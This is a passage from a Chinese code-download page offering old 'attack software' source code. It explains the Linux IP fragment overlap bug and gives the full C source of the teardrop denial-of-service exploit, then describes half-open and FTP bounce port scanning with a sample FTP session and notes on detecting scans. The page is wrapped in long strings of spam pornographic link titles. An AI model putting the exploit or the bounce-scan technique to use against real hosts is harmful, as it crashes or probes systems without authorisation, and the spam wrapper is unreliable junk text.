亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 以前常用的攻擊軟件源代碼 .txt

?? 經典c程序100例
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
register int nleft = len;
register int sum = 0;
u_short answer = 0;

while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}

if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}

sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}


3 Teardrop

在Linux的ip包重組過程中有一個嚴重的漏洞。

在ip_glue()中:

在循環中重組ip包:
fp = qp->fragments;
while(fp != NULL)
{
if(count+fp->len > skb->len)
{
error_to_big;
}
memcpy((ptr + fp->offset), fp->ptr, fp->len);
count += fp->len;
fp = fp->next;
}
這里只檢查了長度過大的情況,而沒有考慮長度過小的情況,
如 fp->len<0 時,也會使內核拷貝過多的東西。

計算分片的結束位置:
end = offset + ntohs(iph->tot_len) - ihl;

當發現當前包的偏移已經在上一個包的中間時(即兩個包是重疊的)
是這樣處理的:
if (prev != NULL && offset < prev->end)
{
i = prev->end - offset;
offset += i; /* ptr into datagram */
ptr += i; /* ptr into fragment data */
}

/* Fill in the structure. */
fp->offset = offset;
fp->end = end;
fp->len = end - offset; //fp->len是一個有符號整數

舉個例子來說明這個漏洞:
第一個碎片:mf=1 offset=0 payload=20
敵二個碎片:mf=0 offset=10 payload=9

這樣第一個碎片的 end=0+20 
offset=0
這樣第二個碎片的 end=9+10=19
offset=offset+(20-offset)=20
fp-〉len=19-20=-1; 

那么memcpy將拷貝過多的數據導致崩潰。


/*
* Copyright (c) 1997 route|daemon9 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux kernels and
* NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
int one = 1, 
count = 0, 
i, 
rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;

fprintf(stderr, "teardrop route|daemon9\n\n");

//建SOCK_RAW
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
//由系統處理IP校驗和。
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}

if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}

while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}

srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;

fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");

for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}

/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */

sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;

/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */

if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}

/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);

if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}

u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}

void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}


4 Portscan 和 Antiportscan

Portscan的兩種主要方法: 
(1) Half-open(半打開)
利用下面特性:但一個主機收到向某個端口(TCP)發出的(SYN),
如果在這個端口有服務,那么返回(SYN+ASK),不然返回(RST)。

(2) FTP scanner
利用了FTP的port命令,例如可以這樣作:
選擇一個FTP服務器,連上后令port命令指向目標機,如果返回
值是正確的,那么目標機的該端口是有服務的,如返回打開端口錯誤則
該端口無服務。
telnet 192.168.1.13 21
Trying 192.168.1.13...
Connected to pp.bricks.org.
Escape character is '^]'.
220 pp.bricks.org FTP server (Version wu-2.4.2-academ[BETA-16](1) 
Thu May 7 23:18:05 EDT 1998) ready.

user anonymous
331 Guest login ok, send your complete e-mail address as password.
pass aa@aa.aa
230 Guest login ok, access restrictions apply.
port a,b,c,d,p1,p2 // a.b.c.d是要探測的目標 p1 p2是目的端口

150 Opening ASCII mode data connection for file list.
425 Can't build data connection: Connection refused.
//該端口未活動 
150 Opening ASCII mode data connection for file list.
226 Transfer complete.
//該端口活動中
但有些FTP服務器禁止你將數據連接影響其他地址,那就沒辦法了。

上述兩種方法是通用的,而針對個別系統有一些特殊方法。

如一些系統受到包后會作如下處理:

標志 活動的端口的應答 不活動端口的應答 

SYN SYN|ACK RST 或 Nothing
SYN|FIN ACK or SYN|ACK* RST
ACK Nothing RST
0 flag Nothing RST

你最好是試一試。

Antiport
一般是調用 sd=socket(PF_INET,SOCK_RAW,6),然后不停的讀,
若發現一個主機不停的象你發送(SYN)包,卻沒有完成連結,可以認
定它在向你做portscan。

notes:
早期的portscan程序是老老實實的向你一個一個端口連(完成三次握手),
而一些antiscan是在一個平時不用的端口上起一個服務器,并認為連上來的
都是向它scan。
 

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
日韩精品一区二| 91啪亚洲精品| 精品久久久久av影院| 美洲天堂一区二卡三卡四卡视频| 欧美精品久久久久久久多人混战 | 国产精品电影院| 成人av在线观| 洋洋成人永久网站入口| 欧美日韩一区二区电影| 免费观看91视频大全| 精品国产乱码久久久久久老虎| 国产一区二区三区在线观看免费视频 | 欧美日韩中文字幕一区| 亚洲电影欧美电影有声小说| 日韩欧美自拍偷拍| 国产成人亚洲综合a∨婷婷 | 亚洲国产视频网站| 欧美一区二区三区日韩视频| 国产馆精品极品| 一区二区三区在线视频观看58| 欧美久久一二三四区| 精品一区二区影视| 亚洲精品中文在线| 精品少妇一区二区| 色综合久久久久综合体| 日韩av不卡在线观看| 国产女人水真多18毛片18精品视频| 成人h动漫精品一区二| 天天影视色香欲综合网老头| 国产人妖乱国产精品人妖| 91美女片黄在线观看91美女| 石原莉奈在线亚洲三区| 亚洲国产高清不卡| 欧美久久久影院| 国产精品一区二区果冻传媒| 亚洲一区二区三区中文字幕在线| 日韩精品一区二| 在线观看日韩精品| 国产精品911| 午夜精品久久一牛影视| 国产精品午夜在线| 日韩精品专区在线影院观看| 99re成人在线| 国产精品影音先锋| 美女视频黄 久久| 亚洲精品成人悠悠色影视| 666欧美在线视频| 91丨porny丨首页| 国产制服丝袜一区| 免费国产亚洲视频| 亚洲国产精品一区二区www| 欧美韩国日本一区| 精品欧美黑人一区二区三区| 欧美熟乱第一页| 不卡一区二区三区四区| 韩国理伦片一区二区三区在线播放| 亚洲制服丝袜av| 亚洲欧美日韩国产成人精品影院| 欧美国产丝袜视频| 久久亚洲捆绑美女| 欧美刺激午夜性久久久久久久| 欧美亚洲国产一区二区三区| 97久久精品人人澡人人爽| 国内精品第一页| 久久综合综合久久综合| 无码av免费一区二区三区试看 | 中文一区一区三区高中清不卡| 日韩免费视频一区| 日韩久久久久久| 日韩免费成人网| 欧美大片日本大片免费观看| 51精品国自产在线| 欧美日韩一区中文字幕| 欧美日韩一区二区在线观看视频| 欧美中文字幕久久| 欧美日本高清视频在线观看| 91黄色免费网站| 欧美在线免费观看亚洲| 欧美性一二三区| 欧美主播一区二区三区| 欧美日本免费一区二区三区| 欧美日韩1234| 精品久久久久久久久久久久久久久久久| 91精品国产综合久久福利 | 在线视频观看一区| 欧美在线免费视屏| 4438x成人网最大色成网站| 欧美精品精品一区| 日韩美女主播在线视频一区二区三区| 欧美成va人片在线观看| 久久久久久黄色| 亚洲欧洲日韩在线| 亚洲一区影音先锋| 日本午夜精品视频在线观看| 看电视剧不卡顿的网站| 国产精品一二一区| jlzzjlzz亚洲女人18| 91免费看`日韩一区二区| 91麻豆视频网站| 欧美系列在线观看| 精品国产乱码久久| 国产精品动漫网站| 午夜精品国产更新| 国产一区二区三区黄视频| 不卡的av电影| 欧美三级日本三级少妇99| 日韩一区二区三区在线| 久久久精品2019中文字幕之3| 国产精品久久久久aaaa| 亚洲成人动漫在线免费观看| 麻豆高清免费国产一区| 成人午夜激情影院| 欧美巨大另类极品videosbest | 欧美午夜一区二区三区 | av午夜一区麻豆| 69堂亚洲精品首页| 国产亲近乱来精品视频| 一区二区成人在线视频 | 成人av动漫网站| 7777精品伊人久久久大香线蕉的| 国产日韩欧美不卡在线| 亚洲一区二区3| 国产精品亚洲一区二区三区妖精| 欧美中文字幕亚洲一区二区va在线| 日韩一级高清毛片| 亚洲免费在线视频一区 二区| 韩国女主播成人在线| 精品视频免费在线| 中文文精品字幕一区二区| 日韩黄色免费网站| 一本色道久久综合亚洲aⅴ蜜桃 | 一本色道久久综合亚洲91| 精品国产一区久久| 亚洲国产精品一区二区久久| 国产成人在线看| 欧美一级理论片| 亚洲精品视频一区| jiyouzz国产精品久久| 日韩精品一区在线| 亚洲国产另类av| 91免费版在线| 国产精品久久久久三级| 久久99精品国产麻豆不卡| 欧美日韩视频在线第一区| 亚洲素人一区二区| 国产成人一区在线| 久久久久久久久免费| 蜜臀a∨国产成人精品| 精品视频在线视频| 亚洲资源中文字幕| 日本精品一区二区三区四区的功能| 国产三级精品三级| 国产综合久久久久久鬼色| 欧美一级片在线| 污片在线观看一区二区 | 日韩一区二区三区免费看| 亚洲影院在线观看| 97精品久久久久中文字幕| 国产精品素人视频| 高清av一区二区| 国产精品午夜久久| 成人成人成人在线视频| 中文字幕欧美激情一区| 国产精品一二三区在线| 国产欧美一区二区精品忘忧草| 久久国产精品99久久久久久老狼 | 国产91色综合久久免费分享| 欧美α欧美αv大片| 蜜桃91丨九色丨蝌蚪91桃色| 日韩午夜电影在线观看| 美女看a上一区| 精品久久一区二区三区| 国产专区欧美精品| 国产三区在线成人av| 国产高清在线观看免费不卡| 欧美激情综合网| 成人国产亚洲欧美成人综合网| 中文字幕欧美激情| jlzzjlzz亚洲日本少妇| 一区二区三区精品视频在线| 欧美中文字幕亚洲一区二区va在线| 一区二区三区国产豹纹内裤在线| 欧美日韩中文字幕精品| 麻豆一区二区99久久久久| 精品日韩一区二区三区免费视频| 精品一区二区三区香蕉蜜桃| 久久久精品免费免费| av欧美精品.com| 亚洲国产一区二区a毛片| 91精品国产综合久久久久久漫画 | 99国产精品视频免费观看| 亚洲精品久久嫩草网站秘色| 欧美日韩一区 二区 三区 久久精品| 五月婷婷另类国产| 精品少妇一区二区三区视频免付费 | 韩国女主播成人在线观看| 久久精品视频在线看| 色综合中文字幕| 日本欧洲一区二区| 国产亚洲欧美色|